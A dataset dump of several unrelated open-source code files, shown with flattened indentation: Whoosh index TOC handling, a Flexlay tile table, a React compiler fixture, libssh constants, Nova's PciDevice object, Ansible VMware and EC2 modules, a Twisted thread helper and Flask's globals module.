elif segm:
name = segm.group(1)
if name not in current_segment_names:
todelete.add(filename)
for filename in todelete:
try:
storage.delete_file(filename)
except OSError:
# Another process still has this file open, I guess
pass
class FileIndex(Index):
def __init__(self, storage, schema=None, indexname=_DEF_INDEX_NAME):
from whoosh.filedb.filestore import Storage
if not isinstance(storage, Storage):
raise ValueError("%r is not a Storage object" % storage)
if not isinstance(indexname, string_type):
raise ValueError("indexname %r is not a string" % indexname)
if schema:
schema = ensure_schema(schema)
self.storage = storage
self._schema = schema
self.indexname = indexname
# Try reading the TOC to see if it's possible
TOC.read(self.storage, self.indexname, schema=self._schema)
@classmethod
def create(cls, storage, schema, indexname=_DEF_INDEX_NAME):
TOC.create(storage, schema, indexname)
return cls(storage, schema, indexname)
def __repr__(self):
return "%s(%r, %r)" % (self.__class__.__name__,
self.storage, self.indexname)
def close(self):
pass
# add_field
# remove_field
def latest_generation(self):
return TOC._latest_generation(self.storage, self.indexname)
# refresh
# up_to_date
def last_modified(self):
gen = self.latest_generation()
filename = TOC._filename(self.indexname, gen)
return self.storage.file_modified(filename)
def is_empty(self):
return len(self._read_toc().segments) == 0
def optimize(self, **kwargs):
w = self.writer(**kwargs)
w.commit(optimize=True)
# searcher
def writer(self, procs=1, **kwargs):
if procs > 1:
from whoosh.multiproc import MpWriter
return MpWriter(self, procs=procs, **kwargs)
else:
from whoosh.writing import SegmentWriter
return SegmentWriter(self, **kwargs)
def lock(self, name):
"""Returns a lock object that you can try to call acquire() on to
lock the index.
"""
return self.storage.lock(self.indexname + "_" + name)
def _read_toc(self):
return TOC.read(self.storage, self.indexname, schema=self._schema)
def _segments(self):
return self._read_toc().segments
def _current_schema(self):
return self._read_toc().schema
@property
def schema(self):
return self._current_schema()
@property
def release(self):
return self._read_toc().release
@property
def version(self):
return self._read_toc().version
@classmethod
def _reader(cls, storage, schema, segments, generation, reuse=None):
# Returns a reader for the given segments, possibly reusing already
# opened readers
from whoosh.reading import SegmentReader, MultiReader, EmptyReader
reusable = {}
try:
if len(segments) == 0:
# This index has no segments! Return an EmptyReader object,
# which simply returns empty or zero to every method
return EmptyReader(schema)
if reuse:
# Put all atomic readers in a dictionary keyed by their
# generation, so we can re-use them if them if possible
readers = [r for r, _ in reuse.leaf_readers()]
reusable = dict((r.generation(), r) for r in readers)
# Make a function to open readers, which reuses reusable readers.
# It removes any readers it reuses from the "reusable" dictionary,
# so later we can close any readers left in the dictionary.
def segreader(segment):
segid = segment.segment_id()
if segid in reusable:
r = reusable[segid]
del reusable[segid]
return r
else:
return SegmentReader(storage, schema, segment,
generation=generation)
if len(segments) == 1:
# This index has one segment, so return a SegmentReader object
# for the segment
return segreader(segments[0])
else:
# This index has multiple segments, so create a list of
# SegmentReaders for the segments, then composite them with a
# MultiReader
readers = [segreader(segment) for segment in segments]
return MultiReader(readers, generation=generation)
finally:
for r in reusable.values():
r.close()
def reader(self, reuse=None):
retries = 10
while retries > 0:
# Read the information from the TOC file
try:
info = self._read_toc()
return self._reader(self.storage, info.schema, info.segments,
info.generation, reuse=reuse)
except IOError:
# Presume that we got a "file not found error" because a writer
# deleted one of the files just as we were trying to open it,
# and so retry a few times before actually raising the
# exception
e = sys.exc_info()[1]
retries -= 1
if retries <= 0:
raise e
sleep(0.05)
# TOC class
class TOC(object):
"""Object representing the state of the index after a commit. Essentially
a container for the index's schema and the list of segment objects.
"""
def __init__(self, schema, segments, generation,
version=_CURRENT_TOC_VERSION, release=__version__):
self.schema = schema
self.segments = segments
self.generation = generation
self.version = version
self.release = release
@classmethod
def _filename(cls, indexname, gen):
return "_%s_%s.toc" % (indexname, gen)
@classmethod
def _pattern(cls, indexname):
return re.compile("^_%s_([0-9]+).toc$" % indexname)
@classmethod
def _segment_pattern(cls, indexname):
return re.compile("(%s_[0-9a-z]+)[.][A-Za-z0-9_.]+" % indexname)
@classmethod
def _latest_generation(cls, storage, indexname):
pattern = cls._pattern(indexname)
mx = -1
for filename in storage:
m = pattern.match(filename)
if m:
mx = max(int(m.group(1)), mx)
return mx
@classmethod
def create(cls, storage, schema, indexname=_DEF_INDEX_NAME):
schema = ensure_schema(schema)
# Clear existing files
prefix = "_%s_" % indexname
for filename in storage:
if filename.startswith(prefix):
storage.delete_file(filename)
# Write a TOC file with an empty list of segments
toc = cls(schema, [], 0)
toc.write(storage, indexname)
@classmethod
def read(cls, storage, indexname, gen=None, schema=None):
if gen is None:
gen = cls._latest_generation(storage, indexname)
if gen < 0:
raise EmptyIndexError("Index %r does not exist in %r"
% (indexname, storage))
# Read the content of this index from the .toc file.
tocfilename = cls._filename(indexname, gen)
stream = storage.open_file(tocfilename)
def check_size(name, target):
sz = stream.read_varint()
if sz != target:
raise IndexError("Index was created on different architecture:"
" saved %s = %s, this computer = %s"
% (name, sz, target))
check_size("int", _INT_SIZE)
check_size("long", _LONG_SIZE)
check_size("float", _FLOAT_SIZE)
if not stream.read_int() == -12345:
raise IndexError("Number misread: byte order problem")
version = stream.read_int()
release = (stream.read_varint(), stream.read_varint(),
stream.read_varint())
if version != _CURRENT_TOC_VERSION:
if version in toc_loaders:
loader = toc_loaders[version]
schema, segments = loader(stream, gen, schema, version)
else:
raise IndexVersionError("Can't read format %s" % version,
version)
else:
# If the user supplied a schema object with the constructor, don't
# load the pickled schema from the saved index.
if schema:
stream.skip_string()
else:
schema = pickle.loads(stream.read_string())
schema = ensure_schema(schema)
# Generation
index_gen = stream.read_int()
assert gen == index_gen
_ = stream.read_int() # Unused
segments = stream.read_pickle()
stream.close()
return cls(schema, segments, gen, version=version, release=release)
def write(self, storage, indexname):
schema = ensure_schema(self.schema)
schema.clean()
# Use a temporary file for atomic write.
tocfilename = self._filename(indexname, self.generation)
tempfilename = '%s.%s' % (tocfilename, time())
stream = storage.create_file(tempfilename)
stream.write_varint(_INT_SIZE)
stream.write_varint(_LONG_SIZE)
stream.write_varint(_FLOAT_SIZE)
stream.write_int(-12345)
stream.write_int(_CURRENT_TOC_VERSION)
for num in __version__[:3]:
stream.write_varint(num)
try:
stream.write_string(pickle.dumps(schema, -1))
except pickle.PicklingError:
# Try to narrow down the error to a single field
for fieldname, field in schema.items():
try:
pickle.dumps(field)
except pickle.PicklingError:
e = sys.exc_info()[1]
raise pickle.PicklingError("%s %s=%r" % (e, fieldname, field))
# Otherwise, re-raise the original exception
raise
stream.write_int(self.generation)
stream.write_int(0) # Unused
stream.write_pickle(self.segments)
stream.close()
# Rename temporary file to the proper filename
storage.rename_file(tempfilename, tocfilename, safe=True) | unknown | codeparrot/codeparrot-clean | ||
# Flexlay - A Generic 2D Game Editor
# Copyright (C) 2014 Ingo Ruhnke <grumbel@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
solid_itiles = [10, 11, 12, 13, 14, 15, 20, 21, 22, 23, 30, 31, 113, 114]
itile_conditions = [
[0, 0, 0, 0, 0, 1, 0, 1, 1, 7],
[0, 0, 1, 0, 0, 1, 0, 1, 1, 7],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 7],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 8],
[0, 0, 0, 0, 0, 0, 1, 1, 0, 9],
[0, 1, 1, 0, 0, 0, 0, 0, 0, 16],
[1, 1, 1, 0, 0, 0, 0, 0, 0, 17],
[1, 1, 1, 1, 0, 0, 0, 0, 0, 17],
[1, 1, 1, 0, 0, 1, 0, 0, 0, 17],
[1, 1, 1, 1, 0, 0, 1, 0, 0, 17],
[1, 1, 1, 0, 0, 1, 0, 0, 1, 17],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 18],
[0, 1, 1, 0, 1, 1, 0, 0, 0, 10],
[1, 1, 1, 0, 1, 1, 0, 0, 0, 11],
[1, 1, 0, 1, 1, 0, 0, 0, 0, 12],
[0, 1, 1, 0, 1, 1, 0, 1, 1, 10],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 11],
[1, 1, 0, 1, 1, 0, 1, 1, 0, 12],
[0, 0, 0, 0, 1, 1, 0, 1, 1, 13],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 14],
[0, 0, 0, 1, 1, 0, 1, 1, 0, 15],
[1, 0, 0, 1, 1, 1, 1, 1, 1, 20],
[1, 1, 0, 1, 1, 0, 1, 1, 1, 21],
[0, 1, 1, 0, 1, 1, 1, 1, 1, 22],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 23],
[1, 1, 1, 1, 1, 0, 1, 1, 0, 30],
[1, 1, 1, 0, 1, 1, 0, 1, 1, 31],
[0, 0, 0, 1, 1, 0, 1, 1, 1, 113],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 114],
]
# EOF # | unknown | codeparrot/codeparrot-clean | ||
## Input
```javascript
function Component() {
let callback = () => {
callback = null;
};
return <div onClick={callback} />;
}
```
## Error
```
Found 1 error:
Error: Cannot reassign variable after render completes
Reassigning `callback` after render has completed can cause inconsistent behavior on subsequent renders. Consider using state instead.
error.function-expression-references-variable-its-assigned-to.ts:3:4
1 | function Component() {
2 | let callback = () => {
> 3 | callback = null;
| ^^^^^^^^ Cannot reassign `callback` after render completes
4 | };
5 | return <div onClick={callback} />;
6 | }
``` | unknown | github | https://github.com/facebook/react | compiler/packages/babel-plugin-react-compiler/src/__tests__/fixtures/compiler/error.function-expression-references-variable-its-assigned-to.expect.md |
# ssh_server_known_e
SSH_SERVER_ERROR = -1
SSH_SERVER_NOT_KNOWN = 0
SSH_SERVER_KNOWN_OK = 1
SSH_SERVER_KNOWN_CHANGED = 2
SSH_SERVER_FOUND_OTHER = 3
SSH_SERVER_FILE_NOT_FOUND = 4
# ssh_options_e
SSH_OPTIONS_HOST = 0x0
SSH_OPTIONS_PORT = 0x1
SSH_OPTIONS_PORT_STR = 0x2
SSH_OPTIONS_FD = 0x3
SSH_OPTIONS_USER = 0x4
SSH_OPTIONS_SSH_DIR = 0x5
SSH_OPTIONS_IDENTITY = 0x6
SSH_OPTIONS_ADD_IDENTITY = 0x7
SSH_OPTIONS_KNOWNHOSTS = 0x8
SSH_OPTIONS_TIMEOUT = 0x9
SSH_OPTIONS_TIMEOUT_USEC = 0xa
SSH_OPTIONS_SSH1 = 0xb
SSH_OPTIONS_SSH2 = 0xc
SSH_OPTIONS_LOG_VERBOSITY = 0xd
SSH_OPTIONS_LOG_VERBOSITY_STR = 0xe
SSH_OPTIONS_CIPHERS_C_S = 0xf
SSH_OPTIONS_CIPHERS_S_C = 0x10
SSH_OPTIONS_COMPRESSION_C_S = 0x11
SSH_OPTIONS_COMPRESSION_S_C = 0x12
SSH_OPTIONS_PROXYCOMMAND = 0x13
SSH_OPTIONS_BINDADDR = 0x14
SSH_OPTIONS_STRICTHOSTKEYCHECK = 0x15
SSH_OPTIONS_COMPRESSION = 0x16
SSH_OPTIONS_COMPRESSION_LEVEL = 0x17
_OT_STRING = 'string'
_OT_UINT = 'uint'
_OT_INT = 'int'
_OT_LONG = 'long'
_OT_BOOL = 'bool'
SSH_OPTIONS = { 'user': (SSH_OPTIONS_USER, _OT_STRING),
'host': (SSH_OPTIONS_HOST, _OT_STRING),
'verbosity': (SSH_OPTIONS_LOG_VERBOSITY, _OT_UINT),
'port': (SSH_OPTIONS_PORT, _OT_UINT),
'fd': (SSH_OPTIONS_FD, _OT_INT),
'ssh_dir': (SSH_OPTIONS_SSH_DIR, _OT_STRING),
'identity': (SSH_OPTIONS_IDENTITY, _OT_STRING),
'add_identity': (SSH_OPTIONS_ADD_IDENTITY, None),
'knownhosts': (SSH_OPTIONS_KNOWNHOSTS, _OT_STRING),
'timeout': (SSH_OPTIONS_TIMEOUT, _OT_LONG),
'timeout_usec': (SSH_OPTIONS_TIMEOUT_USEC, _OT_LONG),
'ssh1': (SSH_OPTIONS_SSH1, _OT_BOOL),
'ssh2': (SSH_OPTIONS_SSH2, _OT_BOOL),
'cipherscs': (SSH_OPTIONS_CIPHERS_C_S, _OT_STRING),
'cipherssc': (SSH_OPTIONS_CIPHERS_S_C, _OT_STRING),
'compresscs': (SSH_OPTIONS_COMPRESSION_C_S, _OT_STRING),
'compresssc': (SSH_OPTIONS_COMPRESSION_S_C, _OT_STRING),
'proxycmd': (SSH_OPTIONS_PROXYCOMMAND, _OT_STRING),
'bindaddr': (SSH_OPTIONS_BINDADDR, _OT_STRING),
'stricthostkeys': (SSH_OPTIONS_STRICTHOSTKEYCHECK, _OT_BOOL),
'compression': (SSH_OPTIONS_COMPRESSION, _OT_STRING),
'compression_n': (SSH_OPTIONS_COMPRESSION_LEVEL, _OT_INT) }
# ssh_auth_e
SSH_AUTH_ERROR = -1
SSH_AUTH_SUCCESS = 0
SSH_AUTH_DENIED = 1
SSH_AUTH_PARTIAL = 2
SSH_AUTH_INFO = 3
SSH_AUTH_AGAIN = 4
# Return codes.
SSH_OK = 0
SSH_ERROR = -1
SSH_AGAIN = -2
SSH_EOF = -127
# ssh_error_types_e
SSH_NO_ERROR = 0
SSH_REQUEST_DENIED = 1
SSH_FATAL = 2
SSH_EINTR = 3
# Status flags.
SSH_CLOSED = 0x01
SSH_READ_PENDING = 0x02
SSH_WRITE_PENDING = 0x04
SSH_CLOSED_ERROR = 0x08 | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2013 Intel Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from oslo_serialization import jsonutils
from nova import db
from nova import objects
from nova.objects import base
from nova.objects import fields
from nova import utils
LOG = logging.getLogger(__name__)
def compare_pci_device_attributes(obj_a, obj_b):
pci_ignore_fields = base.NovaPersistentObject.fields.keys()
for name in obj_a.obj_fields:
if name in pci_ignore_fields:
continue
is_set_a = obj_a.obj_attr_is_set(name)
is_set_b = obj_b.obj_attr_is_set(name)
if is_set_a != is_set_b:
return False
if is_set_a:
if getattr(obj_a, name) != getattr(obj_b, name):
return False
return True
# TODO(berrange): Remove NovaObjectDictCompat
@base.NovaObjectRegistry.register
class PciDevice(base.NovaPersistentObject, base.NovaObject,
base.NovaObjectDictCompat):
"""Object to represent a PCI device on a compute node.
PCI devices are managed by the compute resource tracker, which discovers
the devices from the hardware platform, claims, allocates and frees
devices for instances.
The PCI device information is permanently maintained in a database.
This makes it convenient to get PCI device information, like physical
function for a VF device, adjacent switch IP address for a NIC,
hypervisor identification for a PCI device, etc. It also provides a
convenient way to check device allocation information for administrator
purposes.
A device can be in available/claimed/allocated/deleted/removed state.
A device is available when it is discovered..
A device is claimed prior to being allocated to an instance. Normally the
transition from claimed to allocated is quick. However, during a resize
operation the transition can take longer, because devices are claimed in
prep_resize and allocated in finish_resize.
A device becomes removed when hot removed from a node (i.e. not found in
the next auto-discover) but not yet synced with the DB. A removed device
should not be allocated to any instance, and once deleted from the DB,
the device object is changed to deleted state and no longer synced with
the DB.
Filed notes::
| 'dev_id':
| Hypervisor's identification for the device, the string format
| is hypervisor specific
| 'extra_info':
| Device-specific properties like PF address, switch ip address etc.
"""
# Version 1.0: Initial version
# Version 1.1: String attributes updated to support unicode
# Version 1.2: added request_id field
# Version 1.3: Added field to represent PCI device NUMA node
VERSION = '1.3'
fields = {
'id': fields.IntegerField(),
# Note(yjiang5): the compute_node_id may be None because the pci
# device objects are created before the compute node is created in DB
'compute_node_id': fields.IntegerField(nullable=True),
'address': fields.StringField(),
'vendor_id': fields.StringField(),
'product_id': fields.StringField(),
'dev_type': fields.StringField(),
'status': fields.StringField(),
'dev_id': fields.StringField(nullable=True),
'label': fields.StringField(nullable=True),
'instance_uuid': fields.StringField(nullable=True),
'request_id': fields.StringField(nullable=True),
'extra_info': fields.DictOfStringsField(),
'numa_node': fields.IntegerField(nullable=True),
}
def obj_make_compatible(self, primitive, target_version):
target_version = utils.convert_version_to_tuple(target_version)
if target_version < (1, 2) and 'request_id' in primitive:
del primitive['request_id']
def update_device(self, dev_dict):
"""Sync the content from device dictionary to device object.
The resource tracker updates the available devices periodically.
To avoid meaningless syncs with the database, we update the device
object only if a value changed.
"""
# Note(yjiang5): status/instance_uuid should only be updated by
# functions like claim/allocate etc. The id is allocated by
# database. The extra_info is created by the object.
no_changes = ('status', 'instance_uuid', 'id', 'extra_info')
map(lambda x: dev_dict.pop(x, None),
[key for key in no_changes])
for k, v in dev_dict.items():
if k in self.fields.keys():
self[k] = v
else:
# Note (yjiang5) extra_info.update does not update
# obj_what_changed, set it explicitely
extra_info = self.extra_info
extra_info.update({k: v})
self.extra_info = extra_info
def __init__(self, *args, **kwargs):
super(PciDevice, self).__init__(*args, **kwargs)
self.obj_reset_changes()
self.extra_info = {}
def __eq__(self, other):
return compare_pci_device_attributes(self, other)
def __ne__(self, other):
return not (self == other)
@staticmethod
def _from_db_object(context, pci_device, db_dev):
for key in pci_device.fields:
if key != 'extra_info':
pci_device[key] = db_dev[key]
else:
extra_info = db_dev.get("extra_info")
pci_device.extra_info = jsonutils.loads(extra_info)
pci_device._context = context
pci_device.obj_reset_changes()
return pci_device
@base.remotable_classmethod
def get_by_dev_addr(cls, context, compute_node_id, dev_addr):
db_dev = db.pci_device_get_by_addr(
context, compute_node_id, dev_addr)
return cls._from_db_object(context, cls(), db_dev)
@base.remotable_classmethod
def get_by_dev_id(cls, context, id):
db_dev = db.pci_device_get_by_id(context, id)
return cls._from_db_object(context, cls(), db_dev)
@classmethod
def create(cls, dev_dict):
"""Create a PCI device based on hypervisor information.
As the device object is just created and is not synced with db yet
thus we should not reset changes here for fields from dict.
"""
pci_device = cls()
pci_device.update_device(dev_dict)
pci_device.status = 'available'
return pci_device
@base.remotable
def save(self):
if self.status == 'removed':
self.status = 'deleted'
db.pci_device_destroy(self._context, self.compute_node_id,
self.address)
elif self.status != 'deleted':
updates = self.obj_get_changes()
if 'extra_info' in updates:
updates['extra_info'] = jsonutils.dumps(updates['extra_info'])
if updates:
db_pci = db.pci_device_update(self._context,
self.compute_node_id,
self.address, updates)
self._from_db_object(self._context, self, db_pci)
@base.NovaObjectRegistry.register
class PciDeviceList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
# PciDevice <= 1.1
# Version 1.1: PciDevice 1.2
VERSION = '1.1'
fields = {
'objects': fields.ListOfObjectsField('PciDevice'),
}
child_versions = {
'1.0': '1.1',
# NOTE(danms): PciDevice was at 1.1 before we added this
'1.1': '1.2',
'1.2': '1.3',
}
def __init__(self, *args, **kwargs):
super(PciDeviceList, self).__init__(*args, **kwargs)
self.objects = []
self.obj_reset_changes()
@base.remotable_classmethod
def get_by_compute_node(cls, context, node_id):
db_dev_list = db.pci_device_get_all_by_node(context, node_id)
return base.obj_make_list(context, cls(context), objects.PciDevice,
db_dev_list)
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, uuid):
db_dev_list = db.pci_device_get_all_by_instance_uuid(context, uuid)
return base.obj_make_list(context, cls(context), objects.PciDevice,
db_dev_list) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Joseph Callen <jcallen () csc.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vmware_dvswitch
short_description: Create or remove a distributed vSwitch
description:
- Create or remove a distributed vSwitch
version_added: 2.0
author:
- Joseph Callen (@jcpowermac)
notes:
- Tested on vSphere 6.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
datacenter_name:
description:
- The name of the datacenter that will contain the dvSwitch
required: True
switch_name:
description:
- The name of the switch to create or remove
required: True
switch_version:
description:
- The version of the switch to create. Can be 6.5.0, 6.0.0, 5.5.0, 5.1.0, 5.0.0 with a vcenter running vSphere 6.5
- Needed if you have a vcenter version > ESXi version to join DVS. If not specified version=version of vcenter
required: False
version_added: 2.5
mtu:
description:
- The switch maximum transmission unit
required: True
uplink_quantity:
description:
- Quantity of uplink per ESXi host added to the switch
required: True
discovery_proto:
description:
- Link discovery protocol between Cisco and Link Layer discovery
choices:
- 'cdp'
- 'lldp'
required: True
discovery_operation:
description:
- Select the discovery operation
choices:
- 'both'
- 'none'
- 'advertise'
- 'listen'
state:
description:
- Create or remove dvSwitch
default: 'present'
choices:
- 'present'
- 'absent'
required: False
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
- name: Create dvswitch
local_action:
module: vmware_dvswitch
hostname: vcenter_ip_or_hostname
username: vcenter_username
password: vcenter_password
datacenter_name: datacenter
switch_name: dvSwitch
switch_version: 6.0.0
mtu: 9000
uplink_quantity: 2
discovery_proto: lldp
discovery_operation: both
state: present
'''
try:
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import (HAS_PYVMOMI,
connect_to_api,
find_datacenter_by_name,
find_dvs_by_name,
vmware_argument_spec,
wait_for_task
)
class VMwareDVSwitch(object):
def __init__(self, module):
self.module = module
self.dvs = None
self.switch_name = self.module.params['switch_name']
self.switch_version = self.module.params['switch_version']
self.datacenter_name = self.module.params['datacenter_name']
self.mtu = self.module.params['mtu']
self.uplink_quantity = self.module.params['uplink_quantity']
self.discovery_proto = self.module.params['discovery_proto']
self.discovery_operation = self.module.params['discovery_operation']
self.state = self.module.params['state']
self.content = connect_to_api(module)
def process_state(self):
try:
dvs_states = {
'absent': {
'present': self.state_destroy_dvs,
'absent': self.state_exit_unchanged,
},
'present': {
'update': self.state_update_dvs,
'present': self.state_exit_unchanged,
'absent': self.state_create_dvs,
}
}
dvs_states[self.state][self.check_dvs_configuration()]()
except vmodl.RuntimeFault as runtime_fault:
self.module.fail_json(msg=runtime_fault.msg)
except vmodl.MethodFault as method_fault:
self.module.fail_json(msg=method_fault.msg)
except Exception as e:
self.module.fail_json(msg=str(e))
def create_dvswitch(self, network_folder):
result = None
changed = False
spec = vim.DistributedVirtualSwitch.CreateSpec()
spec.configSpec = vim.dvs.VmwareDistributedVirtualSwitch.ConfigSpec()
spec.configSpec.uplinkPortPolicy = vim.DistributedVirtualSwitch.NameArrayUplinkPortPolicy()
spec.configSpec.linkDiscoveryProtocolConfig = vim.host.LinkDiscoveryProtocolConfig()
spec.configSpec.name = self.switch_name
spec.configSpec.maxMtu = self.mtu
spec.configSpec.linkDiscoveryProtocolConfig.protocol = self.discovery_proto
spec.configSpec.linkDiscoveryProtocolConfig.operation = self.discovery_operation
spec.productInfo = vim.dvs.ProductSpec()
spec.productInfo.name = "DVS"
spec.productInfo.vendor = "VMware"
spec.productInfo.version = self.switch_version
for count in range(1, self.uplink_quantity + 1):
spec.configSpec.uplinkPortPolicy.uplinkPortName.append("uplink%d" % count)
task = network_folder.CreateDVS_Task(spec)
changed, result = wait_for_task(task)
return changed, result
def state_exit_unchanged(self):
self.module.exit_json(changed=False)
def state_destroy_dvs(self):
task = self.dvs.Destroy_Task()
changed, result = wait_for_task(task)
self.module.exit_json(changed=changed, result=str(result))
def state_update_dvs(self):
self.module.exit_json(changed=False, msg="Currently not implemented.")
def state_create_dvs(self):
changed = True
result = None
if not self.module.check_mode:
dc = find_datacenter_by_name(self.content, self.datacenter_name)
changed, result = self.create_dvswitch(dc.networkFolder)
self.module.exit_json(changed=changed, result=str(result))
def check_dvs_configuration(self):
self.dvs = find_dvs_by_name(self.content, self.switch_name)
if self.dvs is None:
return 'absent'
else:
return 'present'
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(dict(datacenter_name=dict(required=True, type='str'),
switch_name=dict(required=True, type='str'),
mtu=dict(required=True, type='int'),
switch_version=dict(type='str'),
uplink_quantity=dict(required=True, type='int'),
discovery_proto=dict(required=True, choices=['cdp', 'lldp'], type='str'),
discovery_operation=dict(required=True, choices=['both', 'none', 'advertise', 'listen'], type='str'),
state=dict(default='present', choices=['present', 'absent'], type='str')))
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
if not HAS_PYVMOMI:
module.fail_json(msg='pyvmomi is required for this module')
vmware_dvswitch = VMwareDVSwitch(module)
vmware_dvswitch.process_state()
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
# Twisted, the Framework of Your Internet
# Copyright (C) 2001-2002 Matthew W. Lefkowitz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""Extended thread dispatching support.
For basic support see reactor threading API docs.
API Stability: stable
Maintainer: U{Itamar Shtull-Trauring<mailto:twisted@itamarst.org>}
"""
# twisted imports
from twisted.python import log, failure
# sibling imports
from twisted.internet import defer, reactor
def _putResultInDeferred(deferred, f, args, kwargs):
"""Run a function and give results to a Deferred."""
from twisted.internet import reactor
try:
result = f(*args, **kwargs)
except:
f = failure.Failure()
reactor.callFromThread(deferred.errback, f)
else:
reactor.callFromThread(deferred.callback, result)
def deferToThread(f, *args, **kwargs):
"""Run function in thread and return result as Deferred."""
d = defer.Deferred()
reactor.callInThread(_putResultInDeferred, d, f, args, kwargs)
return d
def _runMultiple(tupleList):
"""Run a list of functions."""
for f, args, kwargs in tupleList:
f(*args, **kwargs)
def callMultipleInThread(tupleList):
"""Run a list of functions in the same thread.
tupleList should be a list of (function, argsList, kwargsDict) tuples.
"""
reactor.callInThread(_runMultiple, tupleList)
__all__ = ["deferToThread", "callMultipleInThread"] | unknown | codeparrot/codeparrot-clean | ||
from __future__ import annotations
import typing as t
from contextvars import ContextVar
from werkzeug.local import LocalProxy
if t.TYPE_CHECKING: # pragma: no cover
from .app import Flask
from .ctx import _AppCtxGlobals
from .ctx import AppContext
from .sessions import SessionMixin
from .wrappers import Request
T = t.TypeVar("T", covariant=True)
class ProxyMixin(t.Protocol[T]):
def _get_current_object(self) -> T: ...
# These subclasses inform type checkers that the proxy objects look like the
# proxied type along with the _get_current_object method.
class FlaskProxy(ProxyMixin[Flask], Flask): ...
class AppContextProxy(ProxyMixin[AppContext], AppContext): ...
class _AppCtxGlobalsProxy(ProxyMixin[_AppCtxGlobals], _AppCtxGlobals): ...
class RequestProxy(ProxyMixin[Request], Request): ...
class SessionMixinProxy(ProxyMixin[SessionMixin], SessionMixin): ...
_no_app_msg = """\
Working outside of application context.
Attempted to use functionality that expected a current application to be set. To
solve this, set up an app context using 'with app.app_context()'. See the
documentation on app context for more information.\
"""
_cv_app: ContextVar[AppContext] = ContextVar("flask.app_ctx")
app_ctx: AppContextProxy = LocalProxy( # type: ignore[assignment]
_cv_app, unbound_message=_no_app_msg
)
current_app: FlaskProxy = LocalProxy( # type: ignore[assignment]
_cv_app, "app", unbound_message=_no_app_msg
)
g: _AppCtxGlobalsProxy = LocalProxy( # type: ignore[assignment]
_cv_app, "g", unbound_message=_no_app_msg
)
_no_req_msg = """\
Working outside of request context.
Attempted to use functionality that expected an active HTTP request. See the
documentation on request context for more information.\
"""
request: RequestProxy = LocalProxy( # type: ignore[assignment]
_cv_app, "request", unbound_message=_no_req_msg
)
session: SessionMixinProxy = LocalProxy( # type: ignore[assignment]
_cv_app, "session", unbound_message=_no_req_msg
)
def __getattr__(name: str) -> t.Any:
import warnings
if name == "request_ctx":
warnings.warn(
"'request_ctx' has merged with 'app_ctx', and will be removed"
" in Flask 4.0. Use 'app_ctx' instead.",
DeprecationWarning,
stacklevel=2,
)
return app_ctx
raise AttributeError(name) | python | github | https://github.com/pallets/flask | src/flask/globals.py |
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_vol_facts
short_description: Gather facts about ec2 volumes in AWS
description:
- Gather facts about ec2 volumes in AWS
version_added: "2.1"
requirements: [ boto3 ]
author: "Rob White (@wimnat)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value.
See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeVolumes.html) for possible filters.
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Gather facts about all volumes
- ec2_vol_facts:
# Gather facts about a particular volume using volume ID
- ec2_vol_facts:
filters:
volume-id: vol-00112233
# Gather facts about any volume with a tag key Name and value Example
- ec2_vol_facts:
filters:
"tag:Name": Example
# Gather facts about any volume that is attached
- ec2_vol_facts:
filters:
attachment.status: attached
'''
# TODO: Disabled the RETURN as it was breaking docs building. Someone needs to
# fix this
RETURN = '''# '''
import traceback
try:
